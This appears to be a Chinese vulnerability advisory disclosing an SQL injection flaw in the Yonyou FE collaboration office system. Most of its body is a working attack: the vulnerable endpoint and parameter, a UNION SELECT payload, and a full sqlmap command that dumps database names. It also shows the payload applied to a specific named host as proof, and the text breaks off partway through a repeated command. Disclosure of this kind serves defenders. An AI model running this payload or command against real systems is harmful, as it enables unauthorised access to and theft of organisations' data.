用友FE协作办公系统SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 用友FE协作办公系统某处过滤不严,导致SQL注入漏洞,可直接union注入 ``` 注入链接:/system/config/deptTreeXml.jsp?type=group&SG04=1 注入参数:SG04 Payload:SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- Sqlmap注入:python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=24 --dbs --threads 10 --batch -v 1 ``` ### 漏洞证明: (1)http://oa.hzuf.com:9090 http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- [<img src="https://images.seebug.org/upload/201410/261011447b84cca806e65be4c6ea4b021d3df2d2.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/261011447b84cca806e65be4c6ea4b021d3df2d2.png) Sqlmap注入: ``` $ python sqlmap.py -u 'http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息